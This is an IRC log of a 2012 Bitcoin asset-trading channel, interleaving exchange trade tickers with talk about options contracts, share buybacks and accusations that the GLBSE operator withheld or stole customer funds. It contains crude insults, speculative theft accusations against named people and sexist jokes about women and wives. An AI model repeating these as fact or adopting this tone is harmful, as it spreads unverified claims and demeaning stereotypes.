0.1899 BTC [-] Oct 02 02:46:27 [GLBSE] [FDBF] 20 @ 0.149253 = 2.9851 BTC [+] Oct 02 02:55:03 [GLBSE] [ASICMINER] 5 @ 0.11139999 = 0.557 BTC [+] Oct 02 02:55:05 [GLBSE] [ASICMINER] 6 @ 0.1114 = 0.6684 BTC [+] Oct 02 02:55:06 [GLBSE] [ASICMINER] 2 @ 0.1115 = 0.223 BTC [+] Oct 02 02:59:10 [MPEX] [S.MPOE] 8429 @ 0.00036546 = 3.0805 BTC [-] Oct 02 02:59:11 [MPEX] [S.MPOE] 44271 @ 0.0003652 = 16.1678 BTC [-] Oct 02 03:03:03 [GLBSE] [ASICMINER] 6 @ 0.1114 = 0.6684 BTC [-] Oct 02 03:21:51 [GLBSE] [TEEK.USD] 1 @ 0.0777 BTC [+] Oct 02 03:24:17 [MPEX] [F.GIGA.ETF] 689 @ 0.00044183 = 0.3044 BTC [-] Oct 02 03:31:10 [GLBSE] [FPGAMINING] 1 @ 0.43334 BTC [-] Oct 02 03:31:12 [GLBSE] [FPGAMINING] 2 @ 0.43284 = 0.8657 BTC [-] Oct 02 03:31:13 [GLBSE] [FPGAMINING] 9 @ 0.4101 = 3.6909 BTC [-] Oct 02 03:31:14 [GLBSE] [FPGAMINING] 4 @ 0.41 = 1.64 BTC [-] Oct 02 03:34:04 [GLBSE] [PUREMINING] 1 @ 0.10169999 BTC [-] Oct 02 03:35:33 [GLBSE] [PUREMINING] 1 @ 0.1017 BTC [+] Oct 02 03:35:34 knotwork no they're not identical, they're opposite really. Oct 02 03:36:43 how so? Oct 02 03:37:01 you buying from me IS me selling to you surely? Oct 02 03:37:18 yes. but if i buy a put that means i make money if price goes under strike Oct 02 03:37:28 if you buy a sell that means you make money if price goes over strike Oct 02 03:37:41 that is different buyer Oct 02 03:38:17 I meant, given you are buying a call or put, what is different between you buying a put USD for price in BTC or you buying a call BTC for corresponding price in USD? Oct 02 03:38:42 possibly the asset in which you pay the fee Oct 02 03:38:42 [GLBSE] [BFLS.RIG] 3 @ 0.975 = 2.925 BTC [+] Oct 02 03:39:08 but you could pay the fee in bubblegum or francs or anything, how much you pay for the option does not change the option itself Oct 02 03:40:05 it seems like my code for how to handle/resolve a call of X priced in Y should be identical to my code for how to handle a put of Y priced in X Oct 02 03:40:23 just switch the X and Y to switch between call and put Oct 02 03:40:26 well yea Oct 02 03:40:29 in that sense Oct 02 03:41:03 ok good. as what I am trying to figure out is generic code for asset A and asset B calls and puts for any A and B Oct 02 03:41:29 with any price you pay to buy the option being payable in any asset at all probably Oct 02 03:41:59 like hey I will pay one AAPL for an option to sell 100 IBM for 50 CISCO Oct 02 03:42:01 or whatever Oct 02 03:43:55 mostly trying to figure out how much of what such a contract would have to take into its internal variables as collateral to be sure it can pay out come payout time Oct 02 03:44:28 [GLBSE] [OBSI.HRPT] 2 @ 0.01230375 = 0.0246 BTC [+] Oct 02 03:48:36 [MPEX] [S.MPOE] 56457 @ 0.00036596 = 20.661 BTC [+] Oct 02 03:54:44 [GLBSE] [NYAN.B] 3 @ 0.21140027 = 0.6342 BTC [-] Oct 02 03:54:45 [GLBSE] [NYAN.B] 1 @ 0.2114 BTC [-] Oct 02 03:54:47 [GLBSE] [NYAN.B] 1 @ 0.2112 BTC [-] Oct 02 03:54:48 [GLBSE] [NYAN.B] 1 @ 0.211 BTC [-] Oct 02 03:54:49 [GLBSE] [NYAN.B] 1 @ 0.2108 BTC [-] Oct 02 03:54:49 [GLBSE] [NYAN.B] 1 @ 0.2106 BTC [-] Oct 02 03:54:51 [GLBSE] [NYAN.B] 1 @ 0.2104 BTC [-] Oct 02 03:54:52 [GLBSE] [NYAN.B] 2 @ 0.2102 = 0.4204 BTC [-] Oct 02 03:54:53 [GLBSE] [NYAN.B] 1 @ 0.21 BTC [-] Oct 02 03:55:26 [GLBSE] [NYAN.B] 1 @ 0.21140028 BTC [+] Oct 02 03:55:26 [GLBSE] [NYAN.B] 9 @ 0.21 = 1.89 BTC [-] Oct 02 03:56:06 [GLBSE] [DMC] 1 @ 0.05 BTC [-] Oct 02 04:00:59 [GLBSE] [NYAN.C] 2 @ 0.12070001 = 0.2414 BTC [-] Oct 02 04:01:01 [GLBSE] [NYAN.C] 1 @ 0.1207 BTC [-] Oct 02 04:01:01 [GLBSE] [NYAN.C] 6 @ 0.1205 = 0.723 BTC [-] Oct 02 04:01:02 [GLBSE] [NYAN.C] 8 @ 0.1002 = 0.8016 BTC [-] Oct 02 04:01:04 [GLBSE] [NYAN.C] 40 @ 0.1 = 4 BTC [-] Oct 02 04:08:10 [GLBSE] [MMM] 4 @ 0.6 = 2.4 BTC [+] Oct 02 04:08:13 Looking for stocks to buy. Over 200 BTC available. Oct 02 04:14:02 [MPEX] [S.MPOE] 12936 @ 0.00036644 = 4.7403 BTC [+] Oct 02 04:14:04 [MPEX] [S.MPOE] 8747 @ 0.0003652 = 3.1944 BTC [-] Oct 02 04:14:05 [MPEX] [S.MPOE] 15100 @ 0.00036495 = 5.5107 BTC [-] Oct 02 04:14:06 [MPEX] [S.MPOE] 18617 @ 0.00036413 = 6.779 BTC [-] Oct 02 04:14:43 [GLBSE] [ZETA-MINING] 1 @ 0.14210003 BTC [-] Oct 02 04:15:37 [GLBSE] [MMM] 1 @ 0.6 BTC [+] Oct 02 04:15:58 [GLBSE] [ASICMINER] 1 @ 0.11038498 BTC [-] Oct 02 04:16:00 [GLBSE] [ASICMINER] 6 @ 0.11038498 = 0.6623 BTC [-] Oct 02 04:16:01 [GLBSE] [ASICMINER] 2 @ 0.11038499 = 0.2208 BTC [+] Oct 02 04:17:30 [GLBSE] [ZETA-MINING] 2 @ 0.14210002 = 0.2842 BTC [-] Oct 02 04:23:21 [MPEX] [S.DICE] 14705 @ 0.0034 = 49.997 BTC [+] Oct 02 04:31:58 https://bitcointalk.org/index.php?topic=101902.500 Oct 02 04:32:41 [GLBSE] [GSDPT] 10 @ 0.0038 = 0.038 BTC [+] Oct 02 04:32:51 [GLBSE] [GSDPT] 10 @ 0.00388 = 0.0388 BTC [+] Oct 02 04:32:53 so funny Oct 02 04:33:01 don't people already know htat Oct 02 04:34:18 ? Oct 02 04:35:24 aha so evoorhees announced 2k profit for sept. Oct 02 04:37:05 [GLBSE] [BIB.BVPS] 1 @ 0.00389 BTC [-] Oct 02 04:37:30 [GLBSE] [GSDPT] 60 @ 0.00388 = 0.2328 BTC [+] Oct 02 04:37:42 [GLBSE] [YABMC] 4 @ 0.07849999 = 0.314 BTC [+] Oct 02 04:37:44 [GLBSE] [YABMC] 15 @ 0.0785 = 1.1775 BTC [+] Oct 02 04:42:38 Has anybody else noticed the contracts os assets on MPEx are much better than the ones on GLBSE? I don't want to get into a debate about exchanges, but having a decent and detailed contract is a good sign for an asset. Oct 02 04:42:42 my god, people are starting to notice. Oct 02 04:43:06 [GLBSE] [GIGAMINING] 2 @ 0.55720001 = 1.1144 BTC [+] Oct 02 04:43:07 [GLBSE] [GIGAMINING] 1 @ 0.5572 BTC [-] Oct 02 04:43:08 [GLBSE] [GIGAMINING] 1 @ 0.5572 BTC [-] Oct 02 04:43:10 [GLBSE] [GIGAMINING] 3 @ 0.557 = 1.671 BTC [-] Oct 02 04:43:29 [GLBSE] [GSDPT] 27 @ 0.00388 = 0.1048 BTC [+] Oct 02 04:44:06 [GLBSE] [YABMC] 1 @ 0.07947 BTC [+] Oct 02 04:44:07 [GLBSE] [YABMC] 3 @ 0.0795 = 0.2385 BTC [+] Oct 02 04:44:09 [GLBSE] [YABMC] 1 @ 0.0797 BTC [+] Oct 02 04:44:10 [GLBSE] [YABMC] 3 @ 0.0797 = 0.2391 BTC [+] Oct 02 04:44:11 [GLBSE] [YABMC] 11 @ 0.079705 = 0.8768 BTC [+] Oct 02 04:44:11 [GLBSE] [YABMC] 25 @ 0.07970999 = 1.9927 BTC [+] Oct 02 04:44:13 [GLBSE] [YABMC] 5 @ 0.07971 = 0.3986 BTC [+] Oct 02 04:44:14 [GLBSE] [YABMC] 1 @ 0.07971 BTC [+] Oct 02 04:49:27 [MPEX] [S.MPOE] 5400 @ 0.0003643 = 1.9672 BTC [+] Oct 02 04:51:14 [GLBSE] [OBSI.HRPT] 1 @ 0.01187783 BTC [-] Oct 02 04:52:20 [GLBSE] [OBSI.HRPT] 1 @ 0.01145191 BTC [-] Oct 02 04:53:31 [GLBSE] [OBSI.HRPT] 13 @ 0.011 = 0.143 BTC [-] Oct 02 04:55:08 [GLBSE] [GSDPT] 42 @ 0.00388 = 0.163 BTC [+] Oct 02 05:00:22 [GLBSE] [OBSI.HRPT] 57 @ 0.011 = 0.627 BTC [-] Oct 02 05:00:23 [GLBSE] [OBSI.HRPT] 11 @ 0.0100101 = 0.1101 BTC [-] Oct 02 05:00:25 [GLBSE] [OBSI.HRPT] 80 @ 0.01001 = 0.8008 BTC [-] Oct 02 05:00:26 [GLBSE] [OBSI.HRPT] 100 @ 0.01 = 1 BTC [-] Oct 02 05:00:27 [GLBSE] [OBSI.HRPT] 1114 @ 0.01 = 11.14 BTC [-] Oct 02 05:00:28 [GLBSE] [OBSI.HRPT] 1 @ 0.009002 BTC [-] Oct 02 05:00:29 [GLBSE] [OBSI.HRPT] 637 @ 0.009 = 5.733 BTC [-] Oct 02 05:01:03 [GLBSE] [ASICMINER] 7 @ 0.10710002 = 0.7497 BTC [-] Oct 02 05:01:05 [GLBSE] [ASICMINER] 4 @ 0.10710001 = 0.4284 BTC [-] Oct 02 05:01:05 [GLBSE] [ASICMINER] 2 @ 0.107 = 0.214 BTC [-] Oct 02 05:01:06 [GLBSE] [ASICMINER] 5 @ 0.10500101 = 0.525 BTC [-] Oct 02 05:01:59 [GLBSE] [ASICMINER] 4 @ 0.10500101 = 0.42 BTC [-] Oct 02 05:04:16 [GLBSE] [ASICMINER] 3 @ 0.10500101 = 0.315 BTC [-] Oct 02 05:04:43 [GLBSE] [GSDPT] 119 @ 0.00388 = 0.4617 BTC [+] Oct 02 05:04:44 [GLBSE] [GSDPT] 480 @ 0.003888 = 1.8662 BTC [+] Oct 02 05:05:08 And now OBSI pays 0% dividends it seems Oct 02 05:06:17 [GLBSE] [GSDPT] 78 @ 0.003888 = 0.3033 BTC [+] Oct 02 05:06:28 dun dun dun Oct 02 05:06:35 [GLBSE] [OBSI.HRPT] 113 @ 0.009 = 1.017 BTC [-] Oct 02 05:06:37 [GLBSE] [OBSI.HRPT] 87 @ 0.0081 = 0.7047 BTC [-] Oct 02 05:06:49 what i'm curious about is, how the hell is usagi planning to unwind the MIDDLE of what was supposedly a cdo Oct 02 05:07:00 I'm pretty sure it was expected by now. Didn't you short some OBSI? Oct 02 05:07:13 CDO? Oct 02 05:07:33 BTC-Mining cvovered in the meanwhile. but yes, shorted 8-9 covered at 02 lol Oct 02 05:07:42 BTC-Mining i thought so ? Oct 02 05:09:13 btw, BTC-Mining : https://bitcointalk.org/index.php?topic=114775.0 Oct 02 05:14:43 [MPEX] [S.MPOE] 5583 @ 0.00036413 = 2.0329 BTC [-] Oct 02 05:14:44 [MPEX] [S.MPOE] 47239 @ 0.00036396 = 17.1931 BTC [-] Oct 02 05:16:38 Oy, nice to know I get some PR Oct 02 05:17:00 all it takes is not sucking Oct 02 05:17:01 Free, to top it. Oct 02 05:17:05 [GLBSE] [OBSI.HRPT] 1 @ 0.0159213 BTC [+] Oct 02 05:17:08 and apparently even that is a bridge too far for most ppl Oct 02 05:18:33 Aye, but in BTC-BOND's case, I'd better manage the portfolio well. Oct 02 05:19:28 I have much bigger incentives than regular funds. Oct 02 05:21:47 how;s that ? Oct 02 05:23:24 Most of it is my personal portfolio. Any loss eats into it first. Oct 02 05:23:33 a a Oct 02 05:25:56 Fund manager still earn more on a portfolio which does better. Oct 02 05:26:14 But there's no actuall loss for them if it's mismanaged. Oct 02 05:26:44 Except for a lower share of the dividends. Oct 02 05:27:05 aha Oct 02 05:27:13 very easy to mismanage esp if invested on glbse Oct 02 05:29:00 It's almost a miracle I maaged to grow while the market was shrinking, without shorting. Oct 02 05:30:15 [MPEX] [F.GIGA.ETF] 1000 @ 0.00044183 = 0.4418 BTC [-] Oct 02 05:39:10 [GLBSE] [BTC-BOND] 1 @ 0.00989 BTC [+] Oct 02 05:47:11 [GLBSE] [BFLS] 5 @ 0.5 = 2.5 BTC [+] Oct 02 05:48:02 [GLBSE] [BFLS] 2 @ 0.5 = 1 BTC [+] Oct 02 05:49:06 [GLBSE] [BFLS] 2 @ 0.54995 = 1.0999 BTC [+] Oct 02 05:52:38 [GLBSE] [BFLS] 8 @ 0.72 = 5.76 BTC [+] Oct 02 05:52:39 [GLBSE] [BFLS] 1 @ 0.74 BTC [+] Oct 02 05:52:40 [GLBSE] [BFLS] 2 @ 0.79 = 1.58 BTC [+] Oct 02 05:52:41 [GLBSE] [BFLS] 2 @ 0.799 = 1.598 BTC [+] Oct 02 05:53:06 [GLBSE] [GSDPT] 1 @ 0.003888 BTC [+] Oct 02 05:53:39 [GLBSE] [BFLS] 2 @ 0.799 = 1.598 BTC [+] Oct 02 05:53:41 [GLBSE] [BFLS] 1 @ 0.88 BTC [+] Oct 02 05:55:21 [MPEX] [F.GIGA.ETF] 1900 @ 0.00044182 = 0.8395 BTC [-] Oct 02 05:55:22 [MPEX] [F.GIGA.ETF] 4100 @ 0.00044182 = 1.8115 BTC [-] Oct 02 06:03:45 [GLBSE] [GIGAMINING] 2 @ 0.59999999 = 1.2 BTC [+] Oct 02 06:06:03 [GLBSE] [GSDPT] 941 @ 0.003888 = 3.6586 BTC [+] Oct 02 06:06:27 [GLBSE] [BITBOND] 1 @ 0.24959996 BTC [-] Oct 02 06:08:20 [GLBSE] [GSDPT] 1542 @ 0.00388888 = 5.9967 BTC [+] Oct 02 06:12:39 [GLBSE] [CPA] 2 @ 0.034 = 0.068 BTC [-] Oct 02 06:12:41 [GLBSE] [CPA] 20 @ 0.0331 = 0.662 BTC [-] Oct 02 06:12:42 [GLBSE] [CPA] 20 @ 0.0331 = 0.662 BTC [-] Oct 02 06:17:20 [GLBSE] [SILVER] 4 @ 0.00999999 = 0.04 BTC [+] Oct 02 06:20:38 [MPEX] [S.BVPS] 500 @ 0.00351 = 1.755 BTC [+] Oct 02 06:45:54 [MPEX] [S.MPOE] 2000 @ 0.00036414 = 0.7283 BTC [+] Oct 02 06:45:55 [MPEX] [S.MPOE] 8961 @ 0.00036396 = 3.2614 BTC [-] Oct 02 06:45:57 [MPEX] [S.MPOE] 23600 @ 0.00036301 = 8.567 BTC [-] Oct 02 06:45:58 [MPEX] [S.MPOE] 16039 @ 0.00036263 = 5.8162 BTC [-] Oct 02 06:54:18 [GLBSE] [CPA] 20 @ 0.0331 = 0.662 BTC [-] Oct 02 07:05:16 [GLBSE] [PUREMINING] 2 @ 0.1017 = 0.2034 BTC [+] Oct 02 07:09:27 [GLBSE] [ASICMINER] 1 @ 0.11049991 BTC [+] Oct 02 07:11:07 [MPEX] [F.GIGA.ETF] 1000 @ 0.00044182 = 0.4418 BTC [-] Oct 02 07:23:08 [GLBSE] [ASICMINER] 6 @ 0.11029989 = 0.6618 BTC [-] Oct 02 07:25:36 [GLBSE] [ASICMINER] 5 @ 0.11029989 = 0.5515 BTC [-] Oct 02 07:27:19 [GLBSE] [OBSI.HRPT] 6 @ 0.008 = 0.048 BTC [-] Oct 02 07:27:21 [GLBSE] [OBSI.HRPT] 1 @ 0.008 BTC [-] Oct 02 07:27:22 [GLBSE] [OBSI.HRPT] 2 @ 0.00766014 = 0.0153 BTC [-] Oct 02 07:27:23 [GLBSE] [OBSI.HRPT] 1 @ 0.00738504 BTC [-] Oct 02 07:27:24 [GLBSE] [OBSI.HRPT] 2 @ 0.00695626 = 0.0139 BTC [-] Oct 02 07:27:25 [GLBSE] [OBSI.HRPT] 1 @ 0.00545 BTC [-] Oct 02 07:27:26 [GLBSE] [OBSI.HRPT] 2 @ 0.00493982 = 0.0099 BTC [-] Oct 02 07:27:27 [GLBSE] [OBSI.HRPT] 4 @ 0.00407394 = 0.0163 BTC [-] Oct 02 07:27:28 [GLBSE] [OBSI.HRPT] 2 @ 0.00384931 = 0.0077 BTC [-] Oct 02 07:27:29 [GLBSE] [OBSI.HRPT] 4 @ 0.00330422 = 0.0132 BTC [-] Oct 02 07:27:30 [GLBSE] [OBSI.HRPT] 2 @ 0.002725 = 0.0055 BTC [-] Oct 02 07:27:32 [GLBSE] [OBSI.HRPT] 8 @ 0.0023859 = 0.0191 BTC [-] Oct 02 07:27:33 [GLBSE] [OBSI.HRPT] 8 @ 0.00221018 = 0.0177 BTC [-] Oct 02 07:30:00 [GLBSE] [OBSI.HRPT] 94 @ 0.003 = 0.282 BTC [+] Oct 02 07:33:13 [GLBSE] [OBSI.HRPT] 100 @ 0.004 = 0.4 BTC [+] Oct 02 07:33:15 [GLBSE] [OBSI.HRPT] 100 @ 0.005 = 0.5 BTC [+] Oct 02 07:33:16 [GLBSE] [OBSI.HRPT] 100 @ 0.006 = 0.6 BTC [+] **** BEGIN LOGGING AT Tue Oct 2 15:47:36 2012 Oct 02 15:49:27 [MPEX] [F.GIGA.ETF] 10300 @ 0.00044182 = 4.5507 BTC [+] Oct 02 15:49:55 jesus Oct 02 15:50:02 nefario really is going to get a scammer tag Oct 02 15:50:21 maged is giving him one more chance to pull his head out of his ass Oct 02 15:50:56 what now? Oct 02 15:51:49 nefario refuses to send goat his btc that have nothing to do with tygrr assets Oct 02 15:53:20 what, still ? Oct 02 15:53:26 yup Oct 02 15:53:35 da fuck is wrong with that guy ? Oct 02 15:53:38 not only would nefario get a scammer tag, all glbse links get scammer tagged too Oct 02 15:53:42 i mean seriously. is that so hard ? Oct 02 15:53:58 I dont know what the hell happened Oct 02 15:53:59 people keep asking me what i have against glbse. WELL THIS. why not just fucking make sense. Oct 02 15:54:02 I wonder if nefario stole all the money Oct 02 15:54:11 Diablo-D3 you suppose he spent it and is broke ?! Oct 02 15:54:21 it's not the first time nefario has pulled this shit with goat Oct 02 15:54:24 EskimoBob: it would take him 5 seconds with a perl script to find out Oct 02 15:54:31 guruvan hm Oct 02 15:54:33 unless he isnt logging all transactions, which makes him a scammer Oct 02 15:54:38 !ticker BDK-BND Oct 02 15:54:40 Invalid ticker. Oct 02 15:54:44 wait what ? Oct 02 15:54:47 it's delisted ? Oct 02 15:54:51 !ticker BDK.BND Oct 02 15:54:54 [GLBSE:BDK.BND] [Bid: 0.02500001] [Ask: 0.0495] [Spread: 0.02449999] [Last: 0.04] [24hVol: 20.44668999] [7dAvg: 0.04883857] Oct 02 15:54:59 last time he tried to get pirate to lock goat's account there Oct 02 15:55:01 like thats the thing, remember how he didnt do an audit on me? Oct 02 15:55:10 I wonder if glbse _doesnt_ keep a list of tx forever Oct 02 15:55:19 and only the last x Oct 02 15:55:26 Diablo-D3 wow ?! Oct 02 15:55:41 mircea_popescu: well, Ive written shit like this, its trivial, but sometimes fucktards do fucktarded things Oct 02 15:56:08 you dont even need to store the archived tx in the db, just dump them to a text list for perm storage Oct 02 15:56:13 wow was to keeeping txs Oct 02 15:56:18 EskimoBob: no, I said I dont have access to it Oct 02 15:56:29 i mean i understanf the vague privacy benefit, BUT Oct 02 15:56:33 he doesn't give a shit about privacy Oct 02 15:56:34 EskimoBob: the csv link only gives you the previous x tx Oct 02 15:56:43 EskimoBob: I didnt say the db didnt retain them Oct 02 15:56:55 really? that's fucked up Oct 02 15:56:58 not the entire history Oct 02 15:57:06 really? Oct 02 15:57:06 when I was active trading, it was about a month and a halfs worth Oct 02 15:57:17 wait a second. wasn't someone saying they lent nefario 400 quid after the Great Conference Nobody Went To ? Oct 02 15:57:26 srsly, don't tell me nefario spent goat's btc Oct 02 15:57:33 (side benefit to using MPEx....my history is all saved locally) Oct 02 15:57:34 I mean, its easy to code, SORT BY date LIMIT 100 or whatever Oct 02 15:57:50 er SORT BY date DESC Oct 02 15:57:51 guruvan :p Oct 02 15:57:57 I know that nefario was looking for that loan Oct 02 15:58:03 I dont know Oct 02 15:58:05 Diablo-D3 if he's on mysql it's order by Oct 02 15:58:09 lol EskimoBob Oct 02 15:58:11 mircea_popescu: er right Oct 02 15:58:18 sort by is what, postgres ? Oct 02 15:58:18 its order by on any sql impl Oct 02 15:58:20 i dun recall Oct 02 15:58:25 its order by on pg too Oct 02 15:58:25 EskimoBob is a turd sandwich Oct 02 15:58:33 its too early in the morning to code Oct 02 15:58:35 well then dunno wtf sort by you on about :D Oct 02 15:58:48 mircea_popescu: vim would have caught it ;) Oct 02 15:58:49 I guess you've just gotten to be nothing but bitter and foul now EskimoBob - sorry to see that Oct 02 15:59:16 either way, if he doesnt retain all tx Oct 02 15:59:17 fuck him Oct 02 15:59:24 seriously, just fuck him with a chainsaw gently Oct 02 15:59:27 so wha then, blockchain analysis ? Oct 02 15:59:42 mircea_popescu: well no Oct 02 15:59:54 o, he doesn't use one address either huh Oct 02 15:59:57 nothing is done on bitcoin if you move stuff from an asset subaccount to your main account Oct 02 16:00:04 dun dun dun Oct 02 16:00:20 plus both accounts and subaccounts have their own bitcoin addresses Oct 02 16:00:28 and not just one Oct 02 16:00:33 and you can gen a new one on demand Oct 02 16:00:35 so basicalyl it's either that he stole customer funds and got drunk on themn, a la hayseed MF global Oct 02 16:00:39 or else he fucked up the db Oct 02 16:00:42 these are the alternatives ? Oct 02 16:00:45 mircea_popescu: or hes just an asshat Oct 02 16:00:57 yes, admitting he can't rather than just... is an asshat Oct 02 16:00:58 EskimoBob: yeah Oct 02 16:01:03 Im sorry I ever IPO'ed DMC, really Oct 02 16:01:07 this hasnt been worth the trouble Oct 02 16:01:10 ^^ Oct 02 16:01:20 Diablo-D3 not personal but : it's a skill and a profession this. Oct 02 16:01:31 and if you do it naively you just get fucked and it ruins reputations, lives, etcv Oct 02 16:01:36 [GLBSE] [GIGAMINING] 6 @ 0.59000001 = 3.54 BTC [+] Oct 02 16:01:38 [GLBSE] [GIGAMINING] 1 @ 0.59 BTC [-] Oct 02 16:01:41 mircea_popescu: yeah well, nefario fucked us all then Oct 02 16:01:45 just look at kludge. his pretense to be what he ain't fucked up his "non legal" marriage. Oct 02 16:01:45 because this shit doesnt just stop here Oct 02 16:01:48 it goes everywhere Oct 02 16:01:48 and his wife. and his mom. Oct 02 16:01:53 it fucks everyone whos ever used bitcoin Oct 02 16:01:58 and ever will use bitcoin Oct 02 16:02:06 Diablo-D3 the sensible have been taking their shit off glbse for months. the sane since august. Oct 02 16:02:07 well Oct 02 16:02:23 mircea_popescu: well, I bought half the DMC shares back Oct 02 16:02:25 so Im half way there Oct 02 16:02:39 what are you short, like 1k btc ? Oct 02 16:02:44 not as bad as many, i tell you that. Oct 02 16:03:00 mircea_popescu: depends on the price Oct 02 16:03:07 I have >800 btc in assets Oct 02 16:03:15 asicmining paying out will probably help a lot Oct 02 16:03:44 I mean, nefario has done everything possible to fuck DMC Oct 02 16:03:53 like, he didnt properly vet 1mhs bond selllers Oct 02 16:04:04 so they flooded the market and fucked everyone's portfolios Oct 02 16:04:18 EskimoBob: I only hold asicminer, btcmc, and btc-mining Oct 02 16:04:18 [GLBSE] [YABMC] 2 @ 0.07899998 = 0.158 BTC [+] Oct 02 16:04:58 Diablo-D3 this vetting problem becomes very serious now, as he refuses to vet SOME people. Oct 02 16:05:04 it's like... dude. Oct 02 16:05:16 mircea_popescu: well the mhash bond problem is this Oct 02 16:05:30 when ASICs were announced, the mhash bond people flooded the market with bonds that didnt have hardware to back them Oct 02 16:05:46 and semi-pyramid scheme paid out on them until they got their asic hardware Oct 02 16:06:03 which then they'd end up with a huge sum of money, hardware, and a bunch of worthless mhash bonds they could buy back at a fraction Oct 02 16:06:30 yup Oct 02 16:06:39 anyone with any sense would have seen this, and not allowed all the shit. Oct 02 16:06:42 nefario did nothing to these people Oct 02 16:07:00 yet he locked DMC's account for being victimized by it Oct 02 16:08:27 um....that's a little extreme Diablo-D3 - victimized? you were adequately warned here in this channel not to buy up that stuff. Oct 02 16:08:47 guruvan: I was "warned" by people who I dont trust Oct 02 16:08:55 i warned you... Oct 02 16:09:01 mircea_popescu: and I dont trust you. Oct 02 16:09:04 well warned isnt maybe the word. Oct 02 16:09:08 heh mkay. Oct 02 16:09:23 I warned you too :) Oct 02 16:09:30 guruvan: And I dont trust you Oct 02 16:09:30 he doesn't trust you either Oct 02 16:09:40 haha. who do you drust, tiablo ? Oct 02 16:09:40 and EskimoBob is a troll, so trust doenst even enter into this Oct 02 16:09:45 I figured as much Oct 02 16:09:46 mircea_popescu: currently? no one. Oct 02 16:09:51 well that's a problem Oct 02 16:09:59 not personal, but : if you don't trust anyone in the mkt you can't list. Oct 02 16:10:01 period. Oct 02 16:10:02 I trusted nefario, and look where that went. Oct 02 16:10:08 but not as bad as trusting eveyone :D Oct 02 16:10:35 guruvan fo sho. only women should trust everyone, and only if they plan on yearly pregnancies Oct 02 16:10:42 [GLBSE] [YABMC] 4 @ 0.07899999 = 0.316 BTC [+] Oct 02 16:10:57 heh Oct 02 16:12:38 like, one on his nose, one on his toes... Oct 02 16:13:21 anyhow, I may just buy back as much dmc as possible and see where we're at after that Oct 02 16:15:37 It's looking like several are deserved Oct 02 16:16:04 [MPEX] [F.GIGA.ETF] 1188 @ 0.00044181 = 0.5249 BTC [-] Oct 02 16:16:05 [MPEX] [S.MPOE] 11211 @ 0.00036179 = 4.056 BTC [-] Oct 02 16:16:06 Diablo-D3 that sounds like the best avenue atm Oct 02 16:16:06 [MPEX] [S.MPOE] 15668 @ 0.00036158 = 5.6652 BTC [-] Oct 02 16:16:12 but I think there's only room for the one -0 tagging all GLBSE threads would be a good start Oct 02 16:16:38 agreed mircea_popescu - that would be the absolute best thing for DMC Oct 02 16:17:17 EskimoBob: a company can buy back its own shares off the open market. Oct 02 16:20:04 [MPEX] [B.MPCD.B] 33500 @ 0.00095464 = 31.9804 BTC [-] Oct 02 16:20:05 [MPEX] [B.MPCD.B] 94000 @ 0.0009495 = 89.253 BTC [-] Oct 02 16:21:49 Diablo-D3: and if the company has cash, and nothing to spend it on, and shares are cheap, it should buy them back Oct 02 16:22:18 guruvan: yes, and we have cash, nothing to sepdn it on, and the shares are cheap. Oct 02 16:22:37 [GLBSE] [RUGATU] 3 @ 0.1 = 0.3 BTC [-] Oct 02 16:22:38 exactly Oct 02 16:23:12 [GLBSE] [GIGAMINING] 8 @ 0.58000001 = 4.64 BTC [-] Oct 02 16:23:14 [GLBSE] [GIGAMINING] 1 @ 0.58 BTC [-] Oct 02 16:27:40 [GLBSE] [MERGEDMINING] 2 @ 0.06199999 = 0.124 BTC [-] Oct 02 16:27:41 [GLBSE] [MERGEDMINING] 3 @ 0.062 = 0.186 BTC [+] Oct 02 16:28:11 jesus kakobrekla they're ripping you a new one on the forums huh Oct 02 16:28:33 EskimoBob: well, asicminer should be paying out nov or dec Oct 02 16:28:40 so that'd be a nice chunk of change Oct 02 16:28:46 yeah, or never =/ Oct 02 16:28:53 my money's on never. Oct 02 16:29:37 well then what do you think the best asset on the market is? Oct 02 16:29:40 [GLBSE] [PIMP] 5 @ 0.08999999 = 0.45 BTC [+] Oct 02 16:30:01 yeah, but if I get any btc it goes directly into buying dmc Oct 02 16:30:07 [MPEX] [B.MPCD.A] 33500 @ 0.00100076 = 33.5255 BTC [+] Oct 02 16:30:53 [GLBSE] [YABMC] 5 @ 0.07899999 = 0.395 BTC [+] Oct 02 16:31:02 [GLBSE] [YABMC] 1 @ 0.07899999 BTC [+] Oct 02 16:31:27 EskimoBob: yeah but Oct 02 16:31:30 hrm Oct 02 16:31:52 even if btc goes up in value it doesnt make dmc shares go down in value Oct 02 16:32:15 depends. do you hold mining ? Oct 02 16:32:46 mircea_popescu: yeah, its just btcmc, btc-mining, and asicminer Oct 02 16:32:52 most of its in btcmc Oct 02 16:33:04 well if btcv goes to 100 bux they will not stay the same btc Oct 02 16:33:17 btcv? Oct 02 16:33:56 btcs Oct 02 16:34:02 "afaik he considers his wife as an asset" ahahaha the ppl on the forum Oct 02 16:34:21 ya, why isn't he selling HIS WIFE he;s not even married to in order to settle some internet monopoly money debt Oct 02 16:34:24 EskimoBob: yeah =/ Oct 02 16:34:33 he should sell his soul. Oct 02 16:34:33 mircea_popescu: hes selling his wife? Oct 02 16:34:37 no he's not Oct 02 16:34:39 for how much? can she cook? Oct 02 16:34:39 just some idiot Oct 02 16:34:54 im sure she can cook, if you can't cook you can't be a wife Oct 02 16:34:57 you can at most be a husband Oct 02 16:35:27 lolwhat Oct 02 16:35:58 seriously though, I guess I could put half of the dmc assets up for sale Oct 02 16:37:23 [GLBSE] [HYDRO.BONDS] 1 @ 1.399999 BTC [+] Oct 02 16:37:24 [GLBSE] [HYDRO.BONDS] 3 @ 1.4 = 4.2 BTC [+] Oct 02 16:37:27 but btc going up in value doesnt cause dmc shares to go down in price Oct 02 16:37:30 infact, it drives them up Oct 02 16:38:45 who? Oct 02 16:39:57 also related, http://polimedia.us/dtng/c/src/134678546221.jpg Oct 02 16:41:17 Now THAT's an ass(et) Oct 02 16:42:45 mircea_popescu, yes, two dark worlds colliding Oct 02 16:43:11 Diablo-D3: long term yes, but short term, we see some movement out of securities with a rise in the exchange rate (for people wanting to trade BTC for USD for the anticipated drop) Oct 02 16:44:28 guruvan: hrm Oct 02 16:44:31 I guess it could work Oct 02 16:45:11 looks really awesome to me kakobrekla Oct 02 16:45:52 thanks guruvan :) Oct 02 16:53:22 re https://bitcointalk.org/index.php?topic=114742.msg1239011#msg1239011 Oct 02 16:53:38 [GLBSE] [GSDPT] 1 @ 0.0035 BTC [-] Oct 02 16:53:40 [GLBSE] [GSDPT] 300 @ 0.0034 = 1.02 BTC [-] Oct 02 16:53:40 [GLBSE] [GSDPT] 500 @ 0.0034 = 1.7 BTC [-] 